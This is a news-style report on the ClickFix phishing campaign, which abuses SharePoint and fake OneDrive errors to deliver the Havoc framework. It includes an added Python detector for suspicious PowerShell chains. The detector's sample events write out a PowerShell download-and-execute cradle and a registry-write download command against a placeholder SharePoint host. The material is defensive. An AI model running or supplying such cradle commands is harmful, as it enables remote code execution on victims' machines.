A new and increasingly sophisticated phishing campaign known as ClickFix is targeting unsuspecting users by exploiting Microsoft SharePoint to deploy the open-source Havoc post-exploitation framework, according to a report released by Fortinet’s FortiGuard Labs. The phishing attack cleverly disguises itself using fake OneDrive error messages to lure users into executing dangerous PowerShell commands, ultimately giving attackers remote access to infected devices.
The campaign begins with phishing emails containing an HTML attachment labeled “Documents.html.” Once opened, the file displays a forged OneDrive error message—specifically error code 0x8004de86—claiming that a DNS cache issue is preventing users from accessing their files. To resolve the error, users are prompted to click a “How to fix” button. Instead of fixing anything, this button silently copies a malicious PowerShell command to the clipboard, instructing the user to paste and execute it in the Windows Command Prompt.
Once executed, the PowerShell command downloads and runs a second script hosted on a SharePoint server controlled by the attacker. This second-stage script initiates a series of actions that begin with environmental checks. The script looks for signs of a sandboxed or virtual machine environment—commonly used by researchers to analyze malware—and terminates itself if one is detected, evading detection and analysis.
If the device passes this check, the script proceeds to modify the Windows Registry, install Python (if it is not already installed), and download a Python-based script from the attacker-controlled SharePoint instance. This Python script then completes the infection process by downloading and injecting Havoc into the system. Delivered as a dynamic-link library (DLL), Havoc enables the attacker to maintain persistent control over the system, escalate privileges, move laterally within the network, and execute additional malicious operations.
One of the most alarming aspects of this campaign is its use of Microsoft Graph API for communications between the malware and the attacker’s command-and-control (C2) infrastructure. By using Graph API, the malware traffic mimics legitimate SharePoint activity, making it significantly harder for security tools to identify and flag the communication as suspicious.
ClickFix is part of a broader trend in phishing operations where threat actors are increasingly targeting cloud services and leveraging trusted platforms like Microsoft SharePoint. The campaign’s techniques reflect a rising level of sophistication, combining social engineering, stealth evasion, and advanced payload delivery mechanisms.
According to FortiGuard Labs, this campaign is also being used to deliver a variety of malware strains, including infostealers, remote access trojans (RATs), and DarkGate, a malware-as-a-service platform popular among cybercriminals. The campaign is not limited to email vectors; cybercriminals are also utilizing platforms such as Telegram, where fake identity verification services are employed to trick users into executing malicious PowerShell commands.
The scale of the threat is compounded by the growing volume of phishing attacks globally. During Q3 2023, phishing incidents surged by 173%, with a record 493.2 million attacks recorded during the quarter alone. Current estimates suggest that 1.2% of all emails sent daily—or approximately 3.4 billion emails globally—contain some form of malicious content, making phishing one of the most pervasive cybersecurity threats in today’s digital landscape.
Experts warn that as attackers continue to innovate and exploit widely trusted platforms, traditional detection systems are struggling to keep up. This makes user awareness, proactive defense strategies, and AI-powered security solutions more important than ever.
Cybersecurity professionals recommend several measures to help organizations defend against campaigns like ClickFix. First, employee education is essential. Staff should be trained to identify phishing attempts, especially those that urge users to run system-level commands or install software from unofficial sources.
Secondly, organizations should enforce strict access controls, apply least privilege policies, and regularly audit administrative rights to prevent attackers from gaining easy entry points into their networks. Monitoring cloud services for anomalous behaviors—such as unexpected file sharing, unusual login locations, or suspicious file downloads—is also critical in identifying threats early.
Advanced security tools like Sonar, an AI-powered phishing detection tool developed by NordVPN, are being highlighted as effective measures for detecting and blocking phishing threats before they reach end users. These tools use behavior-based analysis and machine learning to flag phishing patterns in real time, reducing the chances of successful infiltration.
Additionally, experts suggest disabling or restricting PowerShell where possible and closely monitoring its usage across endpoints. Any script attempting to modify registry settings, initiate downloads, or interact with external cloud services should be automatically flagged for review. Deploying Endpoint Detection and Response (EDR) solutions capable of real-time analysis and sandboxing can also be instrumental in stopping attacks before they do serious damage.
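To make the monitoring advice above concrete, here is an added example (not code from Fortinet's report or from the campaign) that scores endpoint process-creation events for the behaviours this article describes: PowerShell launched from a user shell, a download cradle, inline execution of fetched content, registry writes, SharePoint hosts in a command line, and, picking up the Graph API observation earlier in the article, a non-browser process talking to graph.microsoft.com. The event shape (image, parent_image, command_line, optional dest_host joined from network telemetry), the hostname contoso-example.sharepoint.com, the sample events and the rule weights are all constructed assumptions; a real deployment would feed Sysmon or EDR events into the same scoring function.

```python
"""Heuristic triage of process-creation events for ClickFix-style chains.

Added example; not Fortinet's code and not the campaign's. Event fields and
weights are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Patterns for the behaviours the article lists: fetching a second stage,
# executing it inline, modifying the registry, and contacting SharePoint/Graph.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|"
    r"DownloadFile|Start-BitsTransfer|curl|wget)\b")
INLINE_EXEC = re.compile(r"(?i)\b(Invoke-Expression|iex)\b")
REGISTRY_WRITE = re.compile(
    r"(?i)\b(Set-ItemProperty|New-ItemProperty|New-Item|reg(\.exe)?\s+add)\b")
CLOUD_HOST = re.compile(
    r"(?i)\b[a-z0-9-]+\.sharepoint\.com\b|\bgraph\.microsoft\.com\b")

USER_SHELLS = {"explorer.exe", "cmd.exe"}          # where a pasted command lands
GRAPH_CLIENTS = {"msedge.exe", "chrome.exe", "firefox.exe", "outlook.exe",
                 "teams.exe", "ms-teams.exe", "onedrive.exe"}  # expected Graph callers


@dataclass
class ProcEvent:
    image: str            # process name, e.g. "powershell.exe"
    parent_image: str     # parent process name
    command_line: str
    dest_host: str = ""   # destination host from joined network telemetry, if any


@dataclass
class Finding:
    score: int
    matched: list
    verdict: str


# (rule name, weight, predicate). Weights are constructed; tune to your telemetry.
RULES = [
    ("shell_from_user_shell", 1,
     lambda e: e.image == "powershell.exe" and e.parent_image in USER_SHELLS),
    ("download_cradle", 2, lambda e: bool(DOWNLOAD_CRADLE.search(e.command_line))),
    ("inline_exec_of_fetched_content", 2,
     lambda e: bool(INLINE_EXEC.search(e.command_line))),
    ("registry_write", 2,
     lambda e: bool(REGISTRY_WRITE.search(e.command_line))
     and "HK" in e.command_line.upper()),
    ("cloud_host_in_command", 1, lambda e: bool(CLOUD_HOST.search(e.command_line))),
    ("python_spawned_by_powershell", 1,
     lambda e: e.image.startswith("python") and e.parent_image == "powershell.exe"),
    ("graph_api_from_non_client", 3,
     lambda e: e.dest_host.lower() == "graph.microsoft.com"
     and e.image.lower() not in GRAPH_CLIENTS),
]


def score_event(e: ProcEvent, alert_at: int = 4, review_at: int = 2) -> Finding:
    """Sum the weights of matching rules and map the total to a verdict."""
    matched = [name for name, _, pred in RULES if pred(e)]
    score = sum(w for name, w, _ in RULES if name in matched)
    verdict = "alert" if score >= alert_at else "review" if score >= review_at else "ok"
    return Finding(score, matched, verdict)


def triage(events):
    """Return (image, verdict) pairs so a pipeline can route alerts."""
    return [(e.image, score_event(e).verdict) for e in events]


# Constructed sample events mirroring the stages the article describes.
SAMPLE_EVENTS = [
    # 1. First stage: user pastes the clipboard command into cmd.exe
    ProcEvent("powershell.exe", "cmd.exe",
              'powershell -c "iex (iwr https://contoso-example.sharepoint.com/sites/p/stage2.ps1)"'),
    # 2. Ordinary admin use: interactive shell from Explorer, nothing fetched
    ProcEvent("powershell.exe", "explorer.exe", "powershell.exe Get-ChildItem C:\\logs"),
    # 3. Second stage: registry change plus download of a Python installer
    ProcEvent("powershell.exe", "powershell.exe",
              "Set-ItemProperty HKCU:\\Software\\Example -Name x -Value 1; "
              "Invoke-WebRequest https://contoso-example.sharepoint.com/sites/p/python.exe "
              "-OutFile C:\\Users\\Public\\python.exe"),
    # 4. Final stage: Python spawned by PowerShell and talking to Graph
    ProcEvent("python.exe", "powershell.exe", "python.exe C:\\Users\\Public\\update.py",
              dest_host="graph.microsoft.com"),
    # 5. Benign: a browser session to Graph from an expected client
    ProcEvent("msedge.exe", "explorer.exe", "msedge.exe --profile-directory=Default",
              dest_host="graph.microsoft.com"),
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        f = score_event(e)
        print(f"{e.image:15} score={f.score} verdict={f.verdict} matched={f.matched}")
```

The point of the weighting is that no single indicator is conclusive: an interactive shell from Explorer scores low, while the combination of a user-shell parent, a download cradle and inline execution (the pasted ClickFix command) or a non-browser process reaching Graph (the C2 channel the article describes) crosses the alert threshold on its own.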
The ClickFix campaign underscores the evolving threat landscape where attackers no longer rely solely on suspicious attachments or sketchy URLs. Instead, they are integrating seamlessly into the tools and platforms people use every day, using those trusted channels to disguise malicious activity.
The use of Microsoft SharePoint and Graph API to host and deliver malware highlights the importance of zero-trust security models—where no application or platform is automatically trusted, and all activity is continuously verified.
As post-exploitation frameworks like Havoc become more widely used in both red teaming and real-world cyberattacks, defenders must remain agile and informed. The line between legitimate enterprise activity and malicious behavior is blurring, and vigilance is the only way to stay ahead.
Organizations are encouraged to regularly update their threat intelligence, patch vulnerable systems, and stay informed about emerging phishing techniques. With attackers refining their methods and phishing attacks reaching all-time highs, the need for robust, adaptive cybersecurity defenses has never been greater.